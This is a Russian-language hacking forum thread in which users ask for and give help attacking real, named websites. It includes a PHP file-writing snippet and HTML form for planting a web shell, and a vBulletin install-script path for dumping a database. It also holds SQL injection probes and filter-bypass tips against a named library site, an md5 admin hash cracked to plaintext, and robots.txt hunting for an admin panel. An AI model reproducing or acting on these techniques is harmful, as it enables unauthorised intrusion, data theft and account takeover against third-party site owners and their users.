Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    Видели когда нибудь такие ссылки:
    http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

    ??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
     
    1 person likes this.
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    модреврайт

    >> Почему?
    Мб потому что значение которое ты указываешь не существует?
     
    1 person likes this.
  3. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    в чем проблема заюзать другую качалку вроде lynx
     
  4. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Nightmarе, а что тебе мешает выполнить команду:

    Пробуй писать полные пути...
     
  5. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    groundhog, по сути у него это и есть)

    Nightmarе, можно создать файл, как сказал groundhog, только его содержимое будет примерно таким:

    PHP:
    <?php file_put_contents('путь до файла'$_POST['file']); ?>
    Далее, создаешь на локале файл:
    HTML:
    <form action='http://site.com/путь_до_получившегося_файла' method='post'>
    <textarea name='file'></textarea>
    <input type='submit'/>
    </form>
    
    Кидаешь в текстарею код шелла, жмешь баттон, и получаешь веб-шел)
     
  6. NooB MC

    NooB MC New Member

    Joined:
    18 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Комрады подскажите!!!
    Нужно похекать сайт на vBulletin 3.5.4
    На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
    Таким образом можно сделать дамп базы данных.
    Как должен будет выглядеть запрос?
    Мне для начала нужно заняться подборкой полей?
    Просто Инъекциями я начал заниматься недавно, в голове полная каша...
    помогите разобраться...
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ага, только перед этим еще убедится, что по данному урлу именно sql-inj, а не просто раскрытие пути и т.п.
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    /install/upgrade_301.php?step=backup

    И вообще... Тебе сюда:

    http://forum.antichat.ru/thread22852.html
     
  9. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Если ты имел в виду это Easy way to 0wn nulled vBulletin installations, то речь идет не о SQL-инъекции, так как получить дамп позволяет отсутствие проверки лицензионого ключа на нуленных версиях vbulletin
     
  10. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    помогите найти админку)
    случайно наткнулся,основной сайт вроде с фильтрацией а подраздел полностью дырявый
    http://www.7info.ru/schools
     
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.7info.ru/robots.txt

    Disallow: /sitadm/
     
  12. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    ElteRUS,у этого раздела schools своя админка вроде
     
  13. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Forbidden

    You don't have permission to access /sitadm/ on this server.

    Это значит я не имею права к просмотру данной папки?
     
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    А просто на главной не пробовал ввести?
     
  15. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    e5c360d1629a5a05bd77f0f45c24fa9e
    Это md5?
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    да

    e5c360d1629a5a05bd77f0f45c24fa9e;rerkjdjl

    hashcracking.info
     
    1 person likes this.
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://ilibrary.ru/text/1320/p.1' - уязвимость есть, делаю
    http://ilibrary.ru/text/1320/p.1+order+by+1+-- - пишет ошибку =(
    Подскажите)
     
  18. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://ilibrary.ru/text/1+)and+substring(version(),1,1)=5;%20--%20((
    подскажите)
     
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1. Там другой комментарий, а именно /*
    2. Там фильтруется "+"
     
    2 people like this.
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    И еще "=" заменяется на "."

    Но можно раскрыть путь:

    http://ilibrary.ru/text/1%22

    и еще там addslashes (http://ru.php.net/addslashes)

    http://ilibrary.ru/text/1'

    так что скорее всего только путь пока
     
    1 person likes this.
Thread Status:
Not open for further replies.